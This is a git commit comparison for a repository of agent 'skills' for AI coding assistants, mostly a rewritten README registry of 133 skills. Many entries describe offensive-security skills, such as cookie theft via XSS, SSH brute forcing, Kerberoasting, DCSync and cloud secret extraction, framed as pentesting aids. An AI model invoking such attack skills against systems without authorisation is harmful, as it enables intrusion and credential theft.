Compare commits
26 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
b5675d55ce | ||
|
|
6dcb7973ad | ||
|
|
9850b6b8e7 | ||
|
|
46d575b8d0 | ||
|
|
02fab354e0 | ||
|
|
226a7596cb | ||
|
|
11c16dbe27 | ||
|
|
95eeb1dd4b | ||
|
|
b1e4d61715 | ||
|
|
d17e7bc767 | ||
|
|
450a8a95a5 | ||
|
|
7a14904fd3 | ||
|
|
59a349075e | ||
|
|
d8b9ac19b2 | ||
|
|
68a457b96b | ||
|
|
98756d75ae | ||
|
|
4ee569d5d5 | ||
|
|
8a4b4383e8 | ||
|
|
9d09626fd2 | ||
|
|
014da3e744 | ||
|
|
113bc99e47 | ||
|
|
3e46a495c9 | ||
|
|
faf478f389 | ||
|
|
266cbf4c6c | ||
|
|
f8eaf7bd50 | ||
|
|
4dcd96e484 |
8
.github/CODEOWNERS
vendored
Normal file
8
.github/CODEOWNERS
vendored
Normal file
@@ -0,0 +1,8 @@
|
||||
# Global owners
|
||||
* @sickn33
|
||||
|
||||
# Skills
|
||||
/skills/ @sickn33
|
||||
|
||||
# Documentation
|
||||
*.md @sickn33
|
||||
33
.github/ISSUE_TEMPLATE/bug_report.md
vendored
Normal file
33
.github/ISSUE_TEMPLATE/bug_report.md
vendored
Normal file
@@ -0,0 +1,33 @@
|
||||
---
|
||||
name: Bug Report
|
||||
about: Create a report to help us improve the skills
|
||||
title: "[BUG] "
|
||||
labels: bug
|
||||
assignees: sickn33
|
||||
---
|
||||
|
||||
**Describe the bug**
|
||||
A clear and concise description of what the bug is.
|
||||
|
||||
**To Reproduce**
|
||||
Steps to reproduce the behavior:
|
||||
|
||||
1. Go to '...'
|
||||
2. Click on '...'
|
||||
3. Scroll down to '...'
|
||||
4. See error
|
||||
|
||||
**Expected behavior**
|
||||
A clear and concise description of what you expected to happen.
|
||||
|
||||
**Screenshots**
|
||||
If applicable, add screenshots to help explain your problem.
|
||||
|
||||
**Environment (please complete the following information):**
|
||||
|
||||
- OS: [e.g. macOS, Windows]
|
||||
- Tool: [e.g. Claude Code, Antigravity]
|
||||
- Version [if known]
|
||||
|
||||
**Additional context**
|
||||
Add any other context about the problem here.
|
||||
19
.github/ISSUE_TEMPLATE/feature_request.md
vendored
Normal file
19
.github/ISSUE_TEMPLATE/feature_request.md
vendored
Normal file
@@ -0,0 +1,19 @@
|
||||
---
|
||||
name: Skill Request
|
||||
about: Suggest a new skill for the collection
|
||||
title: "[REQ] "
|
||||
labels: enhancement
|
||||
assignees: sickn33
|
||||
---
|
||||
|
||||
**Is your feature request related to a problem? Please describe.**
|
||||
A clear and concise description of what the problem is. Ex: I'm always frustrated when [...]
|
||||
|
||||
**Describe the solution you'd like**
|
||||
A description of the skill you want. What trigger should it have? What files should it effect?
|
||||
|
||||
**Describe alternatives you've considered**
|
||||
A clear and concise description of any alternative solutions or features you've considered.
|
||||
|
||||
**Additional context**
|
||||
Add any other context or screenshots about the feature request here.
|
||||
18
.github/PULL_REQUEST_TEMPLATE.md
vendored
Normal file
18
.github/PULL_REQUEST_TEMPLATE.md
vendored
Normal file
@@ -0,0 +1,18 @@
|
||||
## Description
|
||||
|
||||
Please describe your changes. What skill are you adding or modifying?
|
||||
|
||||
## Checklist
|
||||
|
||||
- [ ] My skill follows the [creation guidelines](https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/skill-creator)
|
||||
- [ ] I have run `validate_skills.py`
|
||||
- [ ] I have added my name to the credits (if applicable)
|
||||
|
||||
## Type of Change
|
||||
|
||||
- [ ] New Skill
|
||||
- [ ] Bug Fix
|
||||
- [ ] Documentation Update
|
||||
- [ ] Infrastructure
|
||||
|
||||
## Screenshots (if applicable)
|
||||
6
.gitignore
vendored
Normal file
6
.gitignore
vendored
Normal file
@@ -0,0 +1,6 @@
|
||||
|
||||
MAINTENANCE.md
|
||||
walkthrough.md
|
||||
.agent/rules/
|
||||
.gemini/
|
||||
LOCAL_CONFIG.md
|
||||
256
README.md
256
README.md
@@ -1,23 +1,60 @@
|
||||
# 🌌 Antigravity Awesome Skills
|
||||
# 🌌 Antigravity Awesome Skills: 133+ Agentic Skills for Claude Code, Gemini CLI, Cursor, Copilot & More
|
||||
|
||||
> **The Ultimate Collection of 60+ Agentic Skills for Claude Code (Antigravity)**
|
||||
> **The Ultimate Collection of 133+ Universal Agentic Skills for AI Coding Assistants — Claude Code, Gemini CLI, Codex CLI, Antigravity IDE, GitHub Copilot, Cursor, OpenCode**
|
||||
|
||||
[](https://opensource.org/licenses/MIT)
|
||||
[](https://claude.ai)
|
||||
[](https://github.com/guanyang/antigravity-skills)
|
||||
[](https://claude.ai)
|
||||
[](https://github.com/google-gemini/gemini-cli)
|
||||
[](https://github.com/openai/codex)
|
||||
[](https://cursor.sh)
|
||||
[](https://github.com/features/copilot)
|
||||
[](https://github.com/opencode-ai/opencode)
|
||||
[](https://github.com/anthropics/antigravity)
|
||||
|
||||
**Antigravity Awesome Skills** is a curated, battle-tested collection of **62 high-performance skills** compatible with both **Antigravity** and **Claude Code**, including official skills from **Anthropic** and **Vercel Labs**.
|
||||
**Antigravity Awesome Skills** is a curated, battle-tested library of **133 high-performance agentic skills** designed to work seamlessly across all major AI coding assistants:
|
||||
|
||||
- 🟣 **Claude Code** (Anthropic CLI)
|
||||
- 🔵 **Gemini CLI** (Google DeepMind)
|
||||
- 🟢 **Codex CLI** (OpenAI)
|
||||
- 🔴 **Antigravity IDE** (Google DeepMind)
|
||||
- 🩵 **GitHub Copilot** (VSCode Extension)
|
||||
- 🟠 **Cursor** (AI-native IDE)
|
||||
- ⚪ **OpenCode** (Open-source CLI)
|
||||
|
||||
This repository provides essential skills to transform your AI assistant into a **full-stack digital agency**, including official capabilities from **Anthropic**, **OpenAI**, **Google**, and **Vercel Labs**.
|
||||
|
||||
## 📍 Table of Contents
|
||||
|
||||
- [🔌 Compatibility](#-compatibility)
|
||||
- [Features & Categories](#features--categories)
|
||||
- [Full Skill Registry](#full-skill-registry-6262)
|
||||
- [Full Skill Registry](#full-skill-registry-133133)
|
||||
- [Installation](#installation)
|
||||
- [How to Contribute](#how-to-contribute)
|
||||
- [Credits & Sources](#credits--sources)
|
||||
- [License](#license)
|
||||
|
||||
Whether you are using the Google Deepmind Antigravity framework or the standard Anthropic Claude Code CLI, these skills are designed to drop right in and supercharge your agent.
|
||||
---
|
||||
|
||||
## 🔌 Compatibility
|
||||
|
||||
These skills follow the universal **SKILL.md** format and work with any AI coding assistant that supports agentic skills:
|
||||
|
||||
| Tool | Type | Compatibility | Installation Path |
|
||||
| ------------------- | --------- | ------------- | ---------------------------------------- |
|
||||
| **Claude Code** | CLI | ✅ Full | `.claude/skills/` or `.agent/skills/` |
|
||||
| **Gemini CLI** | CLI | ✅ Full | `.gemini/skills/` or `.agent/skills/` |
|
||||
| **Codex CLI** | CLI | ✅ Full | `.codex/skills/` or `.agent/skills/` |
|
||||
| **Antigravity IDE** | IDE | ✅ Full | `.agent/skills/` |
|
||||
| **Cursor** | IDE | ✅ Full | `.cursor/skills/` or project root |
|
||||
| **GitHub Copilot** | Extension | ⚠️ Partial | Copy skill content to `.github/copilot/` |
|
||||
| **OpenCode** | CLI | ✅ Full | `.opencode/skills/` or `.agent/skills/` |
|
||||
|
||||
> [!TIP]
|
||||
> Most tools auto-discover skills in `.agent/skills/`. For maximum compatibility, clone to this directory.
|
||||
|
||||
---
|
||||
|
||||
Whether you are using **Gemini CLI**, **Claude Code**, **Codex CLI**, **Cursor**, **GitHub Copilot**, **Antigravity**, or **OpenCode**, these skills are designed to drop right in and supercharge your AI agent.
|
||||
|
||||
This repository aggregates the best capabilities from across the open-source community, transforming your AI assistant into a full-stack digital agency capable of Engineering, Design, Security, Marketing, and Autonomous Operations.
|
||||
|
||||
@@ -25,66 +62,128 @@ This repository aggregates the best capabilities from across the open-source com
|
||||
|
||||
The repository is organized into several key areas of expertise:
|
||||
|
||||
| Category | Skills Included |
|
||||
| :----------------------- | :------------------------------------------------------------------------------------- |
|
||||
| **🎨 Creative & Design** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz |
|
||||
| **🛠️ Development** | TDD, Systematic Debugging, Webapp Testing, Backend/Frontend Guidelines, React Patterns |
|
||||
| **🛡️ Cybersecurity** | Ethical Hacking, AWS Pentesting, OWASP Top 100, Pentest Checklists |
|
||||
| **🛸 Autonomous** | **Loki Mode** (Startup-in-a-box), Subagent Orchestration, Parallel Execution |
|
||||
| **📈 Strategy** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming |
|
||||
| **🏗️ Infrastructure** | Linux Shell Scripting, Git Worktrees, Conventional Commits, File Organization |
|
||||
| Category | Skills Count | Key Skills Included |
|
||||
| :-------------------------- | :----------- | :--------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **🛡️ Cybersecurity** | **~50** | Ethical Hacking, Metasploit, Burp Suite, SQLMap, Active Directory, AWS/Cloud Pentesting, OWASP Top 100, Red Team Tools |
|
||||
| **🛠️ Development** | **~25** | TDD, Systematic Debugging, React Patterns, Backend/Frontend Guidelines, Senior Fullstack, Software Architecture |
|
||||
| **🎨 Creative & Design** | **~10** | UI/UX Pro Max, Frontend Design, Canvas, Algorithmic Art, Theme Factory, D3 Viz, Web Artifacts |
|
||||
| **🤖 AI & LLM Development** | **~8** | LLM App Patterns, Autonomous Agent Patterns, Prompt Engineering, Prompt Library, JavaScript Mastery, Bun Development |
|
||||
| **🛸 Autonomous & Agentic** | **~8** | Loki Mode (Startup-in-a-box), Subagent Driven Dev, Dispatching Parallel Agents, Planning With Files, Skill Creator/Developer |
|
||||
| **📄 Document Processing** | **~4** | DOCX (Official), PDF (Official), PPTX (Official), XLSX (Official) |
|
||||
| **📈 Product & Strategy** | **~8** | Product Manager Toolkit, Content Creator, ASO, Doc Co-authoring, Brainstorming, Internal Comms |
|
||||
| **🏗️ Infrastructure & Git** | **~8** | Linux Shell Scripting, Git Worktrees, Git Pushing, Conventional Commits, File Organization, GitHub Workflow Automation |
|
||||
| **🔄 Workflow & Planning** | **~6** | Writing Plans, Executing Plans, Concise Planning, Verification Before Completion, Code Review (Requesting/Receiving) |
|
||||
| **🧪 Testing & QA** | **~4** | Webapp Testing, Playwright Automation, Test Fixing, Testing Patterns |
|
||||
|
||||
---
|
||||
|
||||
## Full Skill Registry (62/62)
|
||||
## Full Skill Registry (133/133)
|
||||
|
||||
Below is the complete list of available skills. Each skill folder contains a `SKILL.md` that can be imported into Antigravity or Claude Code.
|
||||
|
||||
> [!NOTE] > **Document Skills**: We provide both **community** and **official Anthropic** versions for DOCX, PDF, PPTX, and XLSX. Locally, the official versions are used by default (via symlinks). In the repository, both versions are available for flexibility.
|
||||
|
||||
| Skill Name | Description | Path |
|
||||
| :------------------------------- | :------------------------------------------------------------ | :--------------------------------------------- |
|
||||
| **Algorithmic Art** | Creative generative art using p5.js and seeded randomness. | `skills/algorithmic-art` |
|
||||
| **App Store Optimization** | Complete ASO toolkit for iOS and Android app performance. | `skills/app-store-optimization` |
|
||||
| **AWS Pentesting** | Specialized security assessment for Amazon Web Services. | `skills/aws-penetration-testing` |
|
||||
| **Backend Guidelines** | Core architecture patterns for Node/Express microservices. | `skills/backend-dev-guidelines` |
|
||||
| **Brainstorming** | Requirement discovery and intent exploration framework. | `skills/brainstorming` |
|
||||
| **Brand Guidelines (Anthropic)** | Official Anthropic brand styling and visual standards. | `skills/brand-guidelines-anthropic` ⭐ NEW |
|
||||
| **Brand Guidelines (Community)** | Community-contributed brand guidelines and templates. | `skills/brand-guidelines-community` |
|
||||
| **Canvas Design** | Beautiful static visual design in PDF and PNG. | `skills/canvas-design` |
|
||||
| **Claude D3.js** | Advanced data visualization with D3.js. | `skills/claude-d3js-skill` |
|
||||
| **Content Creator** | SEO-optimized marketing and brand voice toolkit. | `skills/content-creator` |
|
||||
| **Core Components** | Design system tokens and baseline UI patterns. | `skills/core-components` |
|
||||
| **Doc Co-authoring** | Structured workflow for technical documentation. | `skills/doc-coauthoring` |
|
||||
| **DOCX (Official)** | Official Anthropic MS Word document manipulation. | `skills/docx-official` ⭐ NEW |
|
||||
| **Ethical Hacking** | Comprehensive penetration testing lifecycle methodology. | `skills/ethical-hacking-methodology` |
|
||||
| **Frontend Design** | Production-grade UI component implementation. | `skills/frontend-design` |
|
||||
| **Frontend Guidelines** | Modern React/TS development patterns and file structure. | `skills/frontend-dev-guidelines` |
|
||||
| **Git Pushing** | Automated staging and conventional commits. | `skills/git-pushing` |
|
||||
| **Internal Comms (Anthropic)** | Official Anthropic corporate communication templates. | `skills/internal-comms-anthropic` ⭐ NEW |
|
||||
| **Internal Comms (Community)** | Community-contributed communication templates. | `skills/internal-comms-community` |
|
||||
| **Kaizen** | Continuous improvement and error-proofing (Poka-Yoke). | `skills/kaizen` |
|
||||
| **Linux Shell Scripting** | Production-ready shell scripts for automation. | `skills/linux-shell-scripting` |
|
||||
| **Loki Mode** | Fully autonomous startup development engine. | `skills/loki-mode` |
|
||||
| **MCP Builder** | High-quality Model Context Protocol (MCP) server creation. | `skills/mcp-builder` |
|
||||
| **NotebookLM** | Source-grounded querying via Google NotebookLM. | `skills/notebooklm` |
|
||||
| **PDF (Official)** | Official Anthropic PDF document manipulation. | `skills/pdf-official` ⭐ NEW |
|
||||
| **Pentest Checklist** | Structured security assessment planning and scoping. | `skills/pentest-checklist` |
|
||||
| **PPTX (Official)** | Official Anthropic PowerPoint manipulation. | `skills/pptx-official` ⭐ NEW |
|
||||
| **Product Toolkit** | RICE prioritization and product discovery frameworks. | `skills/product-manager-toolkit` |
|
||||
| **Prompt Engineering** | Expert patterns for LLM instruction optimization. | `skills/prompt-engineering` |
|
||||
| **React Best Practices** | Vercel's 40+ performance optimization rules for React. | `skills/react-best-practices` ⭐ NEW (Vercel) |
|
||||
| **React UI Patterns** | Standardized loading states and error handling for React. | `skills/react-ui-patterns` |
|
||||
| **Senior Architect** | Scalable system design and architecture diagrams. | `skills/senior-architect` |
|
||||
| **Skill Creator** | Meta-skill for building high-performance agentic skills. | `skills/skill-creator` |
|
||||
| **Software Architecture** | Quality-focused design principles and analysis. | `skills/software-architecture` |
|
||||
| **Systematic Debugging** | Root cause analysis and structured fix verification. | `skills/systematic-debugging` |
|
||||
| **TDD** | Test-Driven Development workflow and red-green-refactor. | `skills/test-driven-development` |
|
||||
| **UI/UX Pro Max** | Advanced design intelligence and 50+ styling options. | `skills/ui-ux-pro-max` |
|
||||
| **Web Artifacts** | Complex React/Tailwind/Shadcn UI artifact builder. | `skills/web-artifacts-builder` |
|
||||
| **Web Design Guidelines** | Vercel's 100+ UI/UX audit rules (accessibility, performance). | `skills/web-design-guidelines` ⭐ NEW (Vercel) |
|
||||
| **Webapp Testing** | Local web application testing with Playwright. | `skills/webapp-testing` |
|
||||
| **XLSX (Official)** | Official Anthropic Excel spreadsheet manipulation. | `skills/xlsx-official` ⭐ NEW |
|
||||
| Skill Name | Description | Path |
|
||||
| :-------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :-------------------------------------- |
|
||||
| **API Fuzzing for Bug Bounty** | This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API penetration testing", "bug bounty API testing", or needs guidance on API security assessment techniques. | `skills/api-fuzzing-bug-bounty` |
|
||||
| **AWS Penetration Testing** | This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment. | `skills/aws-penetration-testing` |
|
||||
| **Active Directory Attacks** | This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing. | `skills/active-directory-attacks` |
|
||||
| **Address GitHub Comments** | Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI. | `skills/address-github-comments` |
|
||||
| **Agent Manager Skill** | Use when you need to manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling. | `skills/agent-manager-skill` |
|
||||
| **Algorithmic Art** | Creating algorithmic art using p5. | `skills/algorithmic-art` |
|
||||
| **App Store Optimization** | Complete App Store Optimization (ASO) toolkit for researching, optimizing, and tracking mobile app performance on Apple App Store and Google Play Store. | `skills/app-store-optimization` |
|
||||
| **Autonomous Agent Patterns** | "Design patterns for building autonomous coding agents. | `skills/autonomous-agent-patterns` |
|
||||
| **Backend Guidelines** | Comprehensive backend development guide for Node. | `skills/backend-dev-guidelines` |
|
||||
| **Brainstorming** | "You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. | `skills/brainstorming` |
|
||||
| **BlockRun** | Agent wallet for LLM micropayments. Use when user needs capabilities Claude lacks (image generation, real-time X/Twitter data) or explicitly requests external models ("blockrun", "use grok", "use gpt", "dall-e", "deepseek"). | `skills/blockrun` |
|
||||
| **Brand Guidelines (Anthropic)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-anthropic` |
|
||||
| **Brand Guidelines (Community)** | Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. | `skills/brand-guidelines-community` |
|
||||
| **Broken Authentication Testing** | This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". | `skills/broken-authentication` |
|
||||
| **Bun Development** | "Modern JavaScript/TypeScript development with Bun runtime. | `skills/bun-development` |
|
||||
| **Burp Suite Web Application Testing** | This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". | `skills/burp-suite-testing` |
|
||||
| **Canvas Design** | Create beautiful visual art in . | `skills/canvas-design` |
|
||||
| **Claude Code Guide** | Master guide for using Claude Code effectively. | `skills/claude-code-guide` |
|
||||
| **Claude D3.js** | Creating interactive data visualisations using d3. | `skills/claude-d3js-skill` |
|
||||
| **Cloud Penetration Testing** | This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". | `skills/cloud-penetration-testing` |
|
||||
| **Concise Planning** | Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist. | `skills/concise-planning` |
|
||||
| **Content Creator** | Create SEO-optimized marketing content with consistent brand voice. | `skills/content-creator` |
|
||||
| **Core Components** | Core component library and design system patterns. | `skills/core-components` |
|
||||
| **Cross-Site Scripting and HTML Injection Testing** | This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". | `skills/xss-html-injection` |
|
||||
| **Dispatching Parallel Agents** | Use when facing 2+ independent tasks that can be worked on without shared state or sequential dependencies. | `skills/dispatching-parallel-agents` |
|
||||
| **Doc Co-authoring** | Guide users through a structured workflow for co-authoring documentation. | `skills/doc-coauthoring` |
|
||||
| **DOCX (Official)** | "Comprehensive document creation, editing, and analysis with support for tracked changes, comments, formatting preservation, and text extraction. | `skills/docx-official` |
|
||||
| **Ethical Hacking Methodology** | This skill should be used when the user asks to "learn ethical hacking", "understand penetration testing lifecycle", "perform reconnaissance", "conduct security scanning", "exploit vulnerabilities", or "write penetration test reports". | `skills/ethical-hacking-methodology` |
|
||||
| **Executing Plans** | Use when you have a written implementation plan to execute in a separate session with review checkpoints. | `skills/executing-plans` |
|
||||
| **File Organizer** | Intelligently organizes files and folders by understanding context, finding duplicates, and suggesting better organizational structures. | `skills/file-organizer` |
|
||||
| **File Path Traversal Testing** | This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". | `skills/file-path-traversal` |
|
||||
| **Finishing Dev Branch** | Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup. | `skills/finishing-a-development-branch` |
|
||||
| **Frontend Design** | Create distinctive, production-grade frontend interfaces with high design quality. | `skills/frontend-design` |
|
||||
| **Frontend Guidelines** | Frontend development guidelines for React/TypeScript applications. | `skills/frontend-dev-guidelines` |
|
||||
| **Git Pushing** | Stage, commit, and push git changes with conventional commit messages. | `skills/git-pushing` |
|
||||
| **GitHub Workflow Automation** | "Automate GitHub workflows with AI assistance. | `skills/github-workflow-automation` |
|
||||
| **HTML Injection Testing** | This skill should be used when the user asks to "test for HTML injection", "inject HTML into web pages", "perform HTML injection attacks", "deface web applications", or "test content injection vulnerabilities". | `skills/html-injection-testing` |
|
||||
| **IDOR Vulnerability Testing** | This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data. | `skills/idor-testing` |
|
||||
| **Internal Comms (Anthropic)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-anthropic` |
|
||||
| **Internal Comms (Community)** | A set of resources to help me write all kinds of internal communications, using the formats that my company likes to use. | `skills/internal-comms-community` |
|
||||
| **JavaScript Mastery** | "Comprehensive JavaScript reference covering 33+ essential concepts every developer should know. | `skills/javascript-mastery` |
|
||||
| **Kaizen** | Guide for continuous improvement, error proofing, and standardization. | `skills/kaizen` |
|
||||
| **Linux Privilege Escalation** | This skill should be used when the user asks to "escalate privileges on Linux", "find privesc vectors on Linux systems", "exploit sudo misconfigurations", "abuse SUID binaries", "exploit cron jobs for root access", "enumerate Linux systems for privilege escalation", or "gain root access from low-privilege shell". | `skills/linux-privilege-escalation` |
|
||||
| **Linux Shell Scripting** | This skill should be used when the user asks to "create bash scripts", "automate Linux tasks", "monitor system resources", "backup files", "manage users", or "write production shell scripts". | `skills/linux-shell-scripting` |
|
||||
| **LLM App Patterns** | "Production-ready patterns for building LLM applications. | `skills/llm-app-patterns` |
|
||||
| **Loki Mode** | Multi-agent autonomous startup system for Claude Code. | `skills/loki-mode` |
|
||||
| **MCP Builder** | Guide for creating high-quality MCP (Model Context Protocol) servers that enable LLMs to interact with external services through well-designed tools. | `skills/mcp-builder` |
|
||||
| **Metasploit Framework** | This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". | `skills/metasploit-framework` |
|
||||
| **Network 101** | This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs. | `skills/network-101` |
|
||||
| **NotebookLM** | Use this skill to query your Google NotebookLM notebooks directly from Claude Code for source-grounded, citation-backed answers from Gemini. | `skills/notebooklm` |
|
||||
| **PDF (Official)** | Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. | `skills/pdf-official` |
|
||||
| **Pentest Checklist** | This skill should be used when the user asks to "plan a penetration test", "create a security assessment checklist", "prepare for penetration testing", "define pentest scope", "follow security testing best practices", or needs a structured methodology for penetration testing engagements. | `skills/pentest-checklist` |
|
||||
| **Pentest Commands** | This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references. | `skills/pentest-commands` |
|
||||
| **Planning With Files** | Implements Manus-style file-based planning for complex tasks. | `skills/planning-with-files` |
|
||||
| **Playwright Automation** | Complete browser automation with Playwright. | `skills/playwright-skill` |
|
||||
| **PPTX (Official)** | "Presentation creation, editing, and analysis. | `skills/pptx-official` |
|
||||
| **Privilege Escalation Methods** | This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems. | `skills/privilege-escalation-methods` |
|
||||
| **Product Toolkit** | Comprehensive toolkit for product managers including RICE prioritization, customer interview analysis, PRD templates, discovery frameworks, and go-to-market strategies. | `skills/product-manager-toolkit` |
|
||||
| **Prompt Engineering** | Expert guide on prompt engineering patterns, best practices, and optimization techniques. | `skills/prompt-engineering` |
|
||||
| **Prompt Library** | "Curated collection of high-quality prompts for various use cases. | `skills/prompt-library` |
|
||||
| **React Best Practices** | React and Next. | `skills/react-best-practices` |
|
||||
| **React UI Patterns** | Modern React UI patterns for loading states, error handling, and data fetching. | `skills/react-ui-patterns` |
|
||||
| **Receiving Code Review** | Use when receiving code review feedback, before implementing suggestions, especially if feedback seems unclear or technically questionable - requires technical rigor and verification, not performative agreement or blind implementation. | `skills/receiving-code-review` |
|
||||
| **Red Team Tools and Methodology** | This skill should be used when the user asks to "follow red team methodology", "perform bug bounty hunting", "automate reconnaissance", "hunt for XSS vulnerabilities", "enumerate subdomains", or needs security researcher techniques and tool configurations from top bug bounty hunters. | `skills/red-team-tools` |
|
||||
| **Requesting Code Review** | Use when completing tasks, implementing major features, or before merging to verify work meets requirements. | `skills/requesting-code-review` |
|
||||
| **SMTP Penetration Testing** | This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". | `skills/smtp-penetration-testing` |
|
||||
| **SQL Injection Testing** | This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". | `skills/sql-injection-testing` |
|
||||
| **SQLMap Database Penetration Testing** | This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing. | `skills/sqlmap-database-pentesting` |
|
||||
| **SSH Penetration Testing** | This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". | `skills/ssh-penetration-testing` |
|
||||
| **Security Scanning Tools** | This skill should be used when the user asks to "perform vulnerability scanning", "scan networks for open ports", "assess web application security", "scan wireless networks", "detect malware", "check cloud security", or "evaluate system compliance". | `skills/scanning-tools` |
|
||||
| **Senior Architect** | Comprehensive software architecture skill for designing scalable, maintainable systems using ReactJS, NextJS, NodeJS, Express, React Native, Swift, Kotlin, Flutter, Postgres, GraphQL, Go, Python. | `skills/senior-architect` |
|
||||
| **Senior Fullstack** | Comprehensive fullstack development skill for building complete web applications with React, Next. | `skills/senior-fullstack` |
|
||||
| **Shodan Reconnaissance and Pentesting** | This skill should be used when the user asks to "search for exposed devices on the internet," "perform Shodan reconnaissance," "find vulnerable services using Shodan," "scan IP ranges with Shodan," or "discover IoT devices and open ports. | `skills/shodan-reconnaissance` |
|
||||
| **Shopify Development** | Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid. Use when user asks about "shopify app", "checkout extension", "shopify theme", "liquid template", "polaris", "shopify graphql", "shopify webhook", or "metafields". | `skills/shopify-development` |
|
||||
| **Skill Creator** | Guide for creating effective skills. | `skills/skill-creator` |
|
||||
| **Skill Developer** | Create and manage Claude Code skills following Anthropic best practices. | `skills/skill-developer` |
|
||||
| **Slack GIF Creator** | Knowledge and utilities for creating animated GIFs optimized for Slack. | `skills/slack-gif-creator` |
|
||||
| **Software Architecture** | Guide for quality focused software architecture. | `skills/software-architecture` |
|
||||
| **Subagent Driven Dev** | Use when executing implementation plans with independent tasks in the current session. | `skills/subagent-driven-development` |
|
||||
| **Systematic Debugging** | Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes. | `skills/systematic-debugging` |
|
||||
| **TDD** | Use when implementing any feature or bugfix, before writing implementation code. | `skills/test-driven-development` |
|
||||
| **Test Fixing** | Run tests and systematically fix all failing tests using smart error grouping. | `skills/test-fixing` |
|
||||
| **Testing Patterns** | Jest testing patterns, factory functions, mocking strategies, and TDD workflow. | `skills/testing-patterns` |
|
||||
| **Theme Factory** | Toolkit for styling artifacts with a theme. | `skills/theme-factory` |
|
||||
| **Top 100 Vulnerabilities** | This skill should be used when the user asks to "identify web application vulnerabilities", "explain common security flaws", "understand vulnerability categories", "learn about injection attacks", "review access control weaknesses", "analyze API security issues", "assess security misconfigurations", "understand client-side vulnerabilities", "examine mobile and IoT security flaws", or "reference the OWASP-aligned vulnerability taxonomy". | `skills/top-web-vulnerabilities` |
|
||||
| **UI/UX Pro Max** | "UI/UX design intelligence. | `skills/ui-ux-pro-max` |
|
||||
| **Using Git Worktrees** | Use when starting feature work that needs isolation from current workspace or before executing implementation plans - creates isolated git worktrees with smart directory selection and safety verification. | `skills/using-git-worktrees` |
|
||||
| **Using Superpowers** | Use when starting any conversation - establishes how to find and use skills, requiring Skill tool invocation before ANY response including clarifying questions. | `skills/using-superpowers` |
|
||||
| **Verification Before Completion** | Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions always. | `skills/verification-before-completion` |
|
||||
| **Web Artifacts** | Suite of tools for creating elaborate, multi-component claude. | `skills/web-artifacts-builder` |
|
||||
| **Web Design Guidelines** | Review UI code for Web Interface Guidelines compliance. | `skills/web-design-guidelines` |
|
||||
